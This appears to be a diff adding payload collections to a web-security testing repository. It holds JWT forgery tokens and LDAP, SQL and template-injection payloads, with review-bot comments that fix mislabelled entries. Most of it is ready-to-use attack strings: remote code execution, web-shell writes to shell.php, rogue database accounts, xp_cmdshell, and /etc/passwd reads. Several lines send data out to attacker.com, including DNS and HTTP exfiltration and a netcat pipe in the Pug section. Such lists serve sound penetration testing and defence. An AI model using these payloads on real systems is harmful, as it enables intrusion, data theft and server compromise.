- **Token Expiration** - Missing or improper `exp` validation
- **SQL Injection in Claims** - Injecting SQL in JWT claims
- **XSS in Claims** - Storing and reflecting XSS payloads in JWT
## JWT Structure
```
header.payload.signature
```
- **Header**: Contains algorithm and token type
- **Payload**: Contains claims (user data)
- **Signature**: Cryptographic signature
## Common Attack Vectors
- Authentication endpoints
- Authorization headers
- Cookie-based JWT storage
- URL parameters with JWT
- Local/Session storage
## Impact
- Authentication bypass
- Privilege escalation
- Account takeover
- Access to unauthorized resources
- Identity spoofing
## Testing Approach
1. Decode the JWT to examine header and payload
2. Test with `alg: none` in header
3. Test algorithm confusion (RS256 → HS256)
4. Brute force weak secrets
5. Modify claims (user ID, role, permissions)
6. Test token expiration validation
7. Check for sensitive data exposure in payload
## Payloads
See `jwt-vulnerabilities-payloads.txt` for a comprehensive list of JWT attack payloads.
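Review bot: two of the "Common Vulnerabilities" entries are not JWT flaws on their own and the doc should state what they depend on: "SQL Injection in Claims" and "XSS in Claims" only arise once the claims are attacker-controlled, i.e. after the signature has been bypassed (`none`, algorithm confusion, weak or leaked secret) or when the application consumes unverified claims as trusted input. Saying so keeps a reader from testing claim injection against a correctly verified token. The "Algorithm Confusion" bullet would also benefit from one sentence on the mechanism, since step 3 of the Testing Approach assumes it: a library that lets the token's own `alg` select the verifier ends up using the RSA public key as an HMAC secret when `alg` is switched to HS256. Finally, there is no mitigation section to match Impact and Testing Approach; suggest a `## Mitigation` list: pin the accepted algorithm server-side instead of reading it from the header, reject `none` and any unlisted `alg`, resolve keys only through an allowlisted `kid` and ignore `jku`/`x5u`/`jwk` unless the URL or key is on an allowlist, and always validate `exp`, `nbf`, `aud` and `iss`.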
@@ -0,0 +1,259 @@
# JWT Vulnerabilities Payloads
# None Algorithm Attack
# Change alg to "none" and remove signature
# Original: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoidGVzdCJ9.signature
# Modified: eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiYWRtaW4ifQ.
# Header: {"alg":"none","typ":"JWT"}
eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiYWRtaW4ifQ.
# Header: {"alg":"None","typ":"JWT"}
eyJhbGciOiJOb25lIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiYWRtaW4ifQ.
# Header: {"alg":"NONE","typ":"JWT"}
eyJhbGciOiJOT05FIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiYWRtaW4ifQ.
# Header: {"alg":"nOnE","typ":"JWT"}
eyJhbGciOiJuT25FIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiYWRtaW4ifQ.
# Algorithm Confusion Attack (RS256 to HS256)
# Change algorithm from RS256 to HS256 and sign with public key
# Header: {"alg":"HS256","typ":"JWT"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW4ifQ.signature_here
# Weak Secret Brute Force
# Common weak secrets to test
secret
password
123456
12345678
admin
test
jwt
key
default
secret123
password123
qwerty
abc123
letmein
changeme
welcome
monkey
12345
iloveyou
trustno1
dragon
# Modified Claims - Privilege Escalation
# Payload: {"user":"admin"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW4ifQ.
# Payload: {"role":"admin"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJyb2xlIjoiYWRtaW4ifQ.
# Payload: {"admin":true}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhZG1pbiI6dHJ1ZX0.
# Payload: {"isAdmin":true}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc0FkbWluIjp0cnVlfQ.
# Payload: {"permissions":["admin","read","write","delete"]}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJwZXJtaXNzaW9ucyI6WyJhZG1pbiIsInJlYWQiLCJ3cml0ZSIsImRlbGV0ZSJdfQ.
# User ID Manipulation
# Payload: {"userId":1}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjF9.
# Payload: {"sub":"1"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxIn0.
# Payload: {"id":1}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MX0.
# Token Expiration Bypass
# Payload: {"exp":9999999999}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjk5OTk5OTk5OTl9.
# Payload: No exp field
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW4ifQ.
# Payload: {"exp":null}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOm51bGx9.
# JWK Header Injection
# Header: {"alg":"RS256","typ":"JWT","jwk":{"kty":"RSA","kid":"key1","n":"...","e":"AQAB"}}
eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCIsImp3ayI6eyJrdHkiOiJSU0EiLCJraWQiOiJrZXkxIiwibiI6Ii4uLiIsImUiOiJBUUFCIn19.payload.signature
# Kid Parameter Injection
# Header: {"alg":"HS256","typ":"JWT","kid":"../../public.key"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6Ii4uLy4uL3B1YmxpYy5rZXkifQ.payload.signature
# Header: {"alg":"HS256","typ":"JWT","kid":"/dev/null"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6Ii9kZXYvbnVsbCJ9.payload.signature
# Header: {"alg":"HS256","typ":"JWT","kid":"../../../dev/null"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6Ii4uLy4uLy4uL2Rldi9udWxsIn0.payload.signature
# SQL Injection in Claims
# Payload: {"username":"admin' OR '1'='1"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluJyBPUiAnMSc9JzEifQ.
# Payload: {"user":"admin'--"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW4nLS0ifQ.
# XSS in Claims
# Payload: {"name":"<script>alert(1)</script>"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoiPHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0PiJ9.
# Payload: {"comment":"<img src=x onerror=alert(1)>"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJjb21tZW50IjoiPGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPiJ9.
# Empty Signature
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW4ifQ.
# Invalid Signature
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW4ifQ.invalid
# JKU Header Injection (JWK Set URL)
# Header: {"alg":"RS256","typ":"JWT","jku":"https://attacker.com/jwks.json"}
eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCIsImprdSI6Imh0dHBzOi8vYXR0YWNrZXIuY29tL2p3a3MuanNvbiJ9.payload.signature
# X5U Header Injection (X.509 URL)
# Header: {"alg":"RS256","typ":"JWT","x5u":"https://attacker.com/cert.pem"}
eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCIsIng1dSI6Imh0dHBzOi8vYXR0YWNrZXIuY29tL2NlcnQucGVtIn0.payload.signature
# X5C Header Injection (X.509 Certificate Chain)
# Header: {"alg":"RS256","typ":"JWT","x5c":["MIIC..."]}
eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCIsIng1YyI6WyJNSUlDLi4uIl19.payload.signature
# Critical Header Parameter Bypass
# Header: {"alg":"HS256","typ":"JWT","crit":["exp"],"exp":9999999999}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCIsImNyaXQiOlsiZXhwIl0sImV4cCI6OTk5OTk5OTk5OX0.payload.signature
# Type Confusion
# Header: {"alg":"HS256","typ":"JWE"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXRSJ9.payload.signature
# Null Byte Injection in Kid
# Header: {"alg":"HS256","typ":"JWT","kid":"key\u0000admin"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6ImtleVx1MDAwMGFkbWluIn0.payload.signature
# Command Injection in Kid
# Header: {"alg":"HS256","typ":"JWT","kid":"key; whoami"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6ImtleTsgd2hvYW1pIn0.payload.signature
# Path Traversal in Kid
# Header: {"alg":"HS256","typ":"JWT","kid":"../../../../etc/passwd"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6Ii4uLy4uLy4uLy4uL2V0Yy9wYXNzd2QifQ.payload.signature
# SQL Injection in Kid
# Header: {"alg":"HS256","typ":"JWT","kid":"key' OR '1'='1"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6ImtleScgT1IgJzEnPScxIn0.payload.signature
# Audience Manipulation
# Payload: {"aud":"admin-api"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJhZG1pbi1hcGkifQ.
# Payload: {"aud":["admin","user","guest"]}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOlsiYWRtaW4iLCJ1c2VyIiwiZ3Vlc3QiXX0.
# Issuer Manipulation
# Payload: {"iss":"trusted-issuer"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJ0cnVzdGVkLWlzc3VlciJ9.
# Not Before (nbf) Bypass
# Payload: {"nbf":0}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYmYiOjB9.
# JWT ID (jti) Manipulation
# Payload: {"jti":"admin-token-123"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJqdGkiOiJhZG1pbi10b2tlbi0xMjMifQ.
# Scope Escalation
# Payload: {"scope":"admin read write delete"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzY29wZSI6ImFkbWluIHJlYWQgd3JpdGUgZGVsZXRlIn0.
# Custom Claims Injection
# Payload: {"custom_role":"superadmin"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJjdXN0b21fcm9sZSI6InN1cGVyYWRtaW4ifQ.
# Payload: {"groups":["admin","developers","security"]}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJncm91cHMiOlsiYWRtaW4iLCJkZXZlbG9wZXJzIiwic2VjdXJpdHkiXX0.
# Numeric Value Manipulation
# Payload: {"level":999}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJsZXZlbCI6OTk5fQ.
# Payload: {"credit":999999}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJjcmVkaXQiOjk5OTk5OX0.
# Boolean Manipulation
# Payload: {"verified":true}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ2ZXJpZmllZCI6dHJ1ZX0.
# Payload: {"premium":true}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJwcmVtaXVtIjp0cnVlfQ.
# Array Injection
# Payload: {"roles":["admin","superuser","root"]}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJyb2xlcyI6WyJhZG1pbiIsInN1cGVydXNlciIsInJvb3QiXX0.
# Null Value Injection
# Payload: {"userId":null}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOm51bGx9.
# Negative Values
# Payload: {"userId":-1}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOi0xfQ.
# Large Numbers
# Payload: {"userId":2147483647}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjIxNDc0ODM2NDd9.
# Unicode Injection
# Payload: {"user":"admin\u0000"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW5cdTAwMDAifQ.
# Base64 URL Encoding Issues
# Missing padding
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW4ifQ.signature
# Extra padding
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9==.eyJ1c2VyIjoiYWRtaW4ifQ==.signature==
# Standard base64 instead of base64url
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9+.eyJ1c2VyIjoiYWRtaW4ifQ/.signature+
# JWT Confusion with Session Tokens
# Use JWT where session token expected
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW4ifQ.
# Empty JWT
..
# Malformed JWT
malformed.jwt.token
header.payload
.payload.signature
header..signature
# JWT in URL
https://target.com/api?token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW4ifQ.signature
# JWT in Cookie
Cookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW4ifQ.signature
# Multiple JWTs
Authorization: Bearer jwt1, Bearer jwt2
# JWT with extra segments
header.payload.signature.extra
# Case-sensitive Algorithm
# Header: {"alg":"hs256","typ":"JWT"}
eyJhbGciOiJoczI1NiIsInR5cCI6IkpXVCJ9.payload.signature
# Header: {"alg":"Hs256","typ":"JWT"}
eyJhbGciOiJIczI1NiIsInR5cCI6IkpXVCJ9.payload.signature
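Review bot: the "Missing padding" entry under "# Base64 URL Encoding Issues" is not a malformed case: JWS segments are base64url without padding by specification, so that token has exactly the same form as the baseline tokens above it, and the comment should be reworded or the entry dropped in favour of the "Extra padding" and "Standard base64 instead of base64url" variants that follow, which do exercise lenient decoders. Separately, the file mixes ready-to-send tokens with template entries whose second and third segments are the literal words payload.signature (the jku, x5u, x5c, crit, typ and kid entries) and the placeholder `Bearer jwt1, Bearer jwt2`; a one-line note at the top of the file saying that those segments must be substituted before use would stop decode failures on those lines from being mistaken for server behaviour when the list is fed to a tool.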
+101
@@ -37,3 +37,104 @@ mail=*
# Attribute extraction
*)(objectClass=*))(%26(objectClass=*
*)(uid=*))(%26(uid=*
# Extended filter injection
*)(|(objectClass=*))
*))%00
%28%29
%26
%7C
*()|%26'
*()|&'
*(|(mail=*))
*(|(objectclass=*))
# Advanced authentication bypass
*)(&(objectClass=*))
*))%00(cn=administrator
admin*)((|userpassword=*)
admin*)((|mail=*))
*)((|(cn=*))
*)(uid=*))(&(uid=*))
# Privilege escalation attempts
*)(userAccountControl:1.2.840.113556.1.4.803:=512)
*)(adminCount=1)
*)(memberOf=CN=Domain Admins*)
*)(memberOf=*)
# Time-based blind LDAP injection
*)(cn=admin))(|(cn=*
*)(cn=a*)(|(cn=*
*)(cn=ab*)(|(cn=*
*)(cn=abc*)(|(cn=*
# Special characters and encoding
%2a
%28
%29
%26
%7c
*%00
%00*
*%20
%20*
# DN injection
cn=*,ou=*,dc=*
cn=admin,ou=*,dc=*
cn=*,ou=users,dc=*
# Multi-attribute injection
(&(uid=admin)(userPassword=*))
(&(cn=admin)(mail=*))
(&(objectClass=person)(uid=*))
(|(&(uid=admin)(userPassword=*))(uid=backup))
# Error-based injection
()
(&)
(|)
(!)
(&(uid=admin)(!(cn=*)))
# Filter chain attacks
*))(|(objectClass=*
*))(|(mail=*
*))(|(userPassword=*
# Attribute enumeration
(uid=*)
(cn=*)
(sn=*)
(mail=*)
(telephoneNumber=*)
(userPassword=*)
(description=*)
# Nested filter injection
(&(uid=admin)(&(cn=*)))
(|(&(uid=admin)(cn=*))(uid=test))
(&(objectClass=person)(|(uid=admin)(uid=root)))
# Comment injection
*);#
*);--
*)//
# Group enumeration
(memberOf=cn=admins*)
(memberOf=cn=users*)
(memberOf=*)
# Substring search
(cn=adm*)
(cn=*admin)
(cn=*admin*)
(uid=a*)
(mail=*@admin.com)
# Range queries
(uidNumber>=1000)
(uidNumber<=5000)
(createTimestamp>=20200101000000Z)
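Review bot: the "# Time-based blind LDAP injection" heading is mislabelled: the four filters under it (`*)(cn=admin))(|(cn=*`, `*)(cn=a*)(|(cn=*`, and the two longer prefixes) are boolean-based substring probes that infer a value one prefix at a time from a true/false response, and LDAP filter syntax has no delay primitive that would make a time-based variant possible, so rename the section to "Boolean-based blind" or fold it into "# Substring search". The "# Comment injection" entries (`*);#`, `*);--`, `*)//`) use SQL and C comment markers that RFC 4515 filter syntax does not recognise; if they stay, a comment explaining which back-end behaviour they target would help. Minor: `%26` is listed under both "# Extended filter injection" and "# Special characters and encoding", `%7C` and `%7c` differ only in case, and `(memberOf=*)` under "# Group enumeration" near-duplicates `*)(memberOf=*)` under "# Privilege escalation attempts".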
+194
@@ -84,3 +84,197 @@ admin'/*
{"$where": "sleep(5000)"}
' || '1'=='1
admin' || 'a'=='a
# Advanced time-based blind SQL injection
# MySQL advanced
' AND (SELECT * FROM (SELECT(SLEEP(5)))a)--
' AND (SELECT SLEEP(5) FROM information_schema.tables LIMIT 1)--
' UNION SELECT IF(1=1,SLEEP(5),0)--
' AND IF(1=1,SLEEP(5),0)--
' OR IF(SUBSTRING(@@version,1,1)='5',SLEEP(5),0)--
# PostgreSQL advanced
'; SELECT CASE WHEN (1=1) THEN pg_sleep(5) ELSE pg_sleep(0) END--
'; SELECT pg_sleep(5) WHERE 1=1--
' AND 1=(SELECT COUNT(*) FROM generate_series(1,1000000))--
# MSSQL advanced
'; IF (1=1) WAITFOR DELAY '0:0:5'--
'; IF (SELECT USER) = 'sa' WAITFOR DELAY '0:0:10'--
' AND (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3)>0--
# Oracle advanced
' AND 1=(SELECT COUNT(*) FROM all_users t1,all_users t2,all_users t3)--
' AND (SELECT UTL_INADDR.get_host_name('127.0.0.1') FROM dual) IS NOT NULL--
' AND (SELECT DBMS_PIPE.RECEIVE_MESSAGE('a',5) FROM dual) IS NULL--
# WAF/Filter bypass techniques
# Space bypass
' OR '1'='1'--
'OR'1'='1'--
'OR'1'='1
'%09OR%091=1-- # Tab
'%0AOR%0A1=1-- # New line
'%0DOR%0D1=1-- # Carriage return
'/**/OR/**/1=1--
# Comment bypass
'/*!OR*/1=1--
'/*! OR */1=1--
'/*!50000OR*/1=1--
'/*!12345OR*/1=1--
# Case variation bypass
' Or '1'='1'--
' oR '1'='1'--
' OR '1'='1'--
' UnIoN SeLeCt--
# Alternative operators
' || '1'='1'--
' && 1=1--
' | 1=1--
' & 1=1--
# Encoding bypass
%27%20OR%201=1--
%27%20%4F%52%20%31%3D%31--
' %4F%52 1=1--
\' OR 1=1--
%5C%27 OR 1=1--
# String concatenation bypass
# MySQL
'||' (SELECT 'x')='x
' OR CONCAT('a','a')='aa'--
# MSSQL
' OR 'a'+'a'='aa'--
' OR 'a'||'a'='aa'--
# Oracle
' OR 'a'||'a'='aa'--
' OR CONCAT('a','a')='aa'--
# PostgreSQL
' OR 'a'||'a'='aa'--
# Obfuscation techniques
' OR 1=1%00--
' OR 1=1%20--
' OR 1=1;%00
' OR 1=1;%20
' OR 1=1/*foo*/--
' OR 1=1#%0A
# Hex encoding
0x61646D696E # admin
0x27206F72202731273D2731 # ' or '1'='1
# Char function
CHAR(39) OR CHAR(49)=CHAR(49) # ' OR '1'='1
' OR CHR(49)=CHR(49)-- # Oracle/PostgreSQL
' OR ASCII(49)=49--
# Advanced UNION attacks
' UNION SELECT table_name,NULL FROM information_schema.tables--
' UNION SELECT column_name,NULL FROM information_schema.columns--
' UNION SELECT username,password FROM users--
' UNION SELECT @@version,NULL,NULL--
' UNION SELECT user(),database(),version()--
# Out-of-band exploitation
# DNS exfiltration (MySQL)
' AND (SELECT LOAD_FILE(CONCAT('\\\\',(SELECT @@version),'.attacker.com\\a')))--
# Oracle UTL_HTTP
' AND (SELECT UTL_HTTP.REQUEST('http://attacker.com/'||(SELECT user FROM dual)) FROM dual)--
# MSSQL xp_dirtree
'; EXEC master..xp_dirtree '\\attacker.com\a'--
# Error-based data extraction
# MySQL
' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT @@version),0x3a,FLOOR(RAND()*2))x FROM information_schema.tables GROUP BY x)y)--
' AND EXTRACTVALUE(1,CONCAT(0x5c,(SELECT @@version)))--
' AND UPDATEXML(1,CONCAT(0x5c,(SELECT @@version)),1)--
# MSSQL
' AND 1=CONVERT(int,(SELECT @@version))--
' AND 1=CAST((SELECT @@version) AS int)--
# PostgreSQL
' AND 1=CAST((SELECT version()) AS numeric)--
# Oracle
' AND 1=CTXSYS.DRITHSX.SN(1,(SELECT banner FROM v$version WHERE rownum=1))--
# Second-order SQL injection
username: admin'--
password: anything
# JSON-based SQL injection
{"username":"admin' OR '1'='1","password":"x"}
{"id":"1' UNION SELECT NULL--"}
# XML-based SQL injection
<user><name>admin' OR '1'='1</name></user>
# LDAP + SQL combined
*)(uid=*))(&(uid=admin' OR '1'='1
# Cookie-based SQL injection
Cookie: id=1' OR '1'='1--
# HTTP Header injection
User-Agent: ' OR '1'='1--
Referer: ' OR '1'='1--
X-Forwarded-For: ' OR '1'='1--
# Routed SQL injection (through application)
/?search=x' AND (SELECT * FROM users WHERE username='admin')--
# Advanced boolean-based blind
' AND (SELECT SUBSTRING(password,1,1) FROM users WHERE username='admin')='a'--
' AND (SELECT ASCII(SUBSTRING(password,1,1)) FROM users LIMIT 1)>100--
' AND (SELECT LENGTH(password) FROM users WHERE username='admin')>5--
# Bitwise operations
' AND (SELECT @@version)&1--
' AND (SELECT 1)^1=0--
# String functions exploitation
' AND (SELECT REVERSE('olleh'))='hello'--
' AND (SELECT REPLACE('test','t','x'))='xesx'--
' AND (SELECT SUBSTRING('hello',1,1))='h'--
# Database enumeration
' UNION SELECT schema_name,NULL FROM information_schema.schemata--
' UNION SELECT table_name,table_schema FROM information_schema.tables--
' UNION SELECT column_name,table_name FROM information_schema.columns--
# Privilege escalation attempts
'; GRANT ALL PRIVILEGES ON *.* TO 'attacker'@'%'--
'; ALTER USER 'root'@'localhost' IDENTIFIED BY 'hacked'--
'; CREATE USER attacker IDENTIFIED BY 'pass123'--
# File operations
# MySQL
' UNION SELECT LOAD_FILE('/etc/passwd')--
' INTO OUTFILE '/var/www/html/shell.php'--
' INTO DUMPFILE '/var/www/html/shell.php'--
# PostgreSQL
'; COPY (SELECT '') TO '/tmp/output.txt'--
# MSSQL
'; EXEC xp_cmdshell 'dir'--
'; EXEC sp_configure 'xp_cmdshell',1--
# Conditional responses
' AND IF(1=1,1,(SELECT 1 UNION SELECT 2))--
' AND CASE WHEN (1=1) THEN 1 ELSE 0 END--
# Mass assignment attacks via SQL
' UPDATE users SET role='admin' WHERE username='attacker'--
' INSERT INTO users (username,role) VALUES ('attacker','admin')--
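Review bot: under "# String concatenation bypass", the MSSQL entry `' OR 'a'||'a'='aa'--` is misfiled: T-SQL concatenates strings with `+` (the line directly above it) and does not accept `||`, so this line can only produce a syntax error against SQL Server; the same line already appears verbatim under the Oracle and PostgreSQL headings. In "# Mass assignment attacks via SQL", the two stacked statements (`' UPDATE users SET ...` and `' INSERT INTO users ...`) lack the `;` terminator that every other stacked-query entry in this file uses (compare `'; GRANT ...`, `'; EXEC ...`), so as written they are not valid after the closing quote. Minor: `' OR '1'='1'--` appears under both "# Space bypass" and "# Case variation bypass", and `' OR ASCII(49)=49--` evaluates ASCII of the string "49" (first character "4", code 52), so it is a false condition rather than the always-true probe the surrounding lines provide.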
+37
@@ -0,0 +1,37 @@
# Server-Side Template Injection (SSTI)
## Description
Server-Side Template Injection occurs when user input is embedded in a template in an unsafe manner, allowing attackers to inject template directives and execute arbitrary code on the server. SSTI can lead to remote code execution, information disclosure, and complete server compromise.
## Common Vulnerable Template Engines
- **Jinja2** (Python - Flask, Django)
- **Twig** (PHP)
- **Freemarker** (Java)
- **Velocity** (Java)
- **Smarty** (PHP)
- **Pug/Jade** (Node.js)
- **ERB** (Ruby on Rails)
- **Thymeleaf** (Java)
## Common Attack Vectors
- User input in template rendering
- Email templates with user-controlled content
- Error messages with dynamic content
- Markdown/Wiki renderers
- PDF generators
- Report generators
## Testing Approach
1. Inject template syntax like `{{7*7}}` or `${7*7}` in input fields
2. Observe if mathematical expressions are evaluated
3. Identify the template engine through error messages or syntax
4. Escalate to code execution using engine-specific payloads
## Detection Methods
- Submit polyglot payloads: `${{<%[%'"}}%\`
- Test mathematical operations: `{{7*7}}`, `${7*7}`
- Check for template-specific syntax errors
- Analyze response differences
## Payloads
See `ssti-payloads.txt` for a comprehensive list of SSTI payloads.
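Review bot: in "## Common Vulnerable Template Engines", pairing Django with Jinja2 is misleading: Django's default engine is its own Django Template Language, which the companion `ssti-payloads.txt` already treats separately under "# Django (Python)", and Jinja2 is only an optional backend there, so list Django on its own line or qualify the entry. The page also has testing and detection sections but no mitigation section; a short "## Mitigation" block (never build template source from user input, pass user data only as context variables, prefer logic-less or sandboxed engines, keep the engine up to date) would make the page usable by the defenders who triage findings produced with these payloads.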
+310
@@ -0,0 +1,310 @@
# Server-Side Template Injection (SSTI) Payloads
# Detection/Polyglot payloads
${{<%[%'"}}%\
{{7*7}}
${7*7}
<%= 7*7 %>
${{7*7}}
#{7*7}
*{7*7}
# Jinja2 (Python - Flask)
# Basic detection
{{7*7}}
{{7*'7'}}
{{config}}
{{self}}
# Information disclosure
{{config.items()}}
{{self.__dict__}}
{{request.environ}}
{{request.application.__globals__}}
# File read
{{''.__class__.__mro__[1].__subclasses__()[40]('/etc/passwd').read()}}
{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}
# Remote code execution
{{self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read()}}
{{self._TemplateReference__context.joiner.__init__.__globals__.os.popen('whoami').read()}}
{{''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()}}
{{config.__class__.__init__.__globals__['os'].popen('cat /etc/passwd').read()}}
{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}
{{request['application']['__globals__']['__builtins__']['__import__']('os').popen('ls').read()}}
{{lipsum.__globals__['os'].popen('whoami').read()}}
{{cycler.__init__.__globals__.os.popen('id').read()}}
{{joiner.__init__.__globals__.os.popen('id').read()}}
{{namespace.__init__.__globals__.os.popen('id').read()}}
# Jinja2 sandbox escape
{{''.__class__.__base__.__subclasses__()}}
{{[].__class__.__base__.__subclasses__()}}
{{''.__class__.__mro__[1].__subclasses__()}}
# Twig (PHP)
# Basic detection
{{7*7}}
{{7*'7'}}
{{dump(app)}}
{{app.request.server.all|join(',')}}
# Information disclosure
{{_self.env.getGlobals()}}
{{_self.env}}
{{dump(_context)}}
# Remote code execution
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("whoami")}}
{{['id']|filter('system')}}
{{['cat /etc/passwd']|filter('system')}}
{{['cat\x20/etc/passwd']|filter('system')}}
{{['id']|map('passthru')|join}}
{{['whoami']|map('system')|join}}
{{'a'.toUpperCase()}}
{{1*1}}{{6*6}}
# Freemarker (Java)
# Basic detection
${7*7}
#{7*7}
<#assign ex="freemarker.template.utility.Execute"?new()> ${ex("id")}
# Remote code execution
<#assign ex="freemarker.template.utility.Execute"?new()>${ex("whoami")}
<#assign ex="freemarker.template.utility.Execute"?new()>${ex("cat /etc/passwd")}
<#assign ex="freemarker.template.utility.ObjectConstructor"?new()>${ex("java.lang.ProcessBuilder","id").start()}
${"freemarker.template.utility.Execute"?new()("id")}
# Information disclosure
${.data_model}
${.globals}
${.main}
${.namespace}
${.current_namespace}
${.vars}
# Velocity (Java)
# Basic detection
#set($x=7*7)$x
${{7*7}}
# Remote code execution
#set($str=$class.inspect("java.lang.String").type)
#set($chr=$class.inspect("java.lang.Character").type)
#set($ex=$class.inspect("java.lang.Runtime").type.getRuntime().exec("whoami"))
#set($null=$ex.waitFor())
#foreach($i in [1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end
#set($x='')##
#set($rt=$x.class.forName('java.lang.Runtime'))##
#set($chr=$x.class.forName('java.lang.Character'))##
#set($str=$x.class.forName('java.lang.String'))##
#set($ex=$rt.getRuntime().exec('id'))##
$ex.waitFor()
#set($out=$ex.getInputStream())##
#foreach($i in [1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end
# Smarty (PHP)
# Basic detection
{$smarty.version}
{php}echo `id`;{/php}
{7*7}
# Remote code execution
{system('ls')}
{system('cat /etc/passwd')}
{php}system('id');{/php}
{php}phpinfo();{/php}
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}
# Information disclosure
{$smarty.template}
{$smarty.current_dir}
{$smarty.template_dir}
# Pug/Jade (Node.js)
# Basic detection
#{7*7}
!{7*7}
# Remote code execution
#{function(){localLoad=global.process.mainModule.constructor._load;sh=localLoad("child_process").exec('whoami')}()}
#{global.process.mainModule.require('child_process').exec('id')}
#{global.process.mainModule.require('child_process').execSync('id').toString()}
- var x = root.process
- x = x.mainModule.require
- x = x('child_process')
= x.exec('id | nc attacker.com 8080')
# ERB (Ruby on Rails)
# Basic detection
<%= 7*7 %>
<%= system('whoami') %>
# Remote code execution
<%= system('id') %>
<%= `id` %>
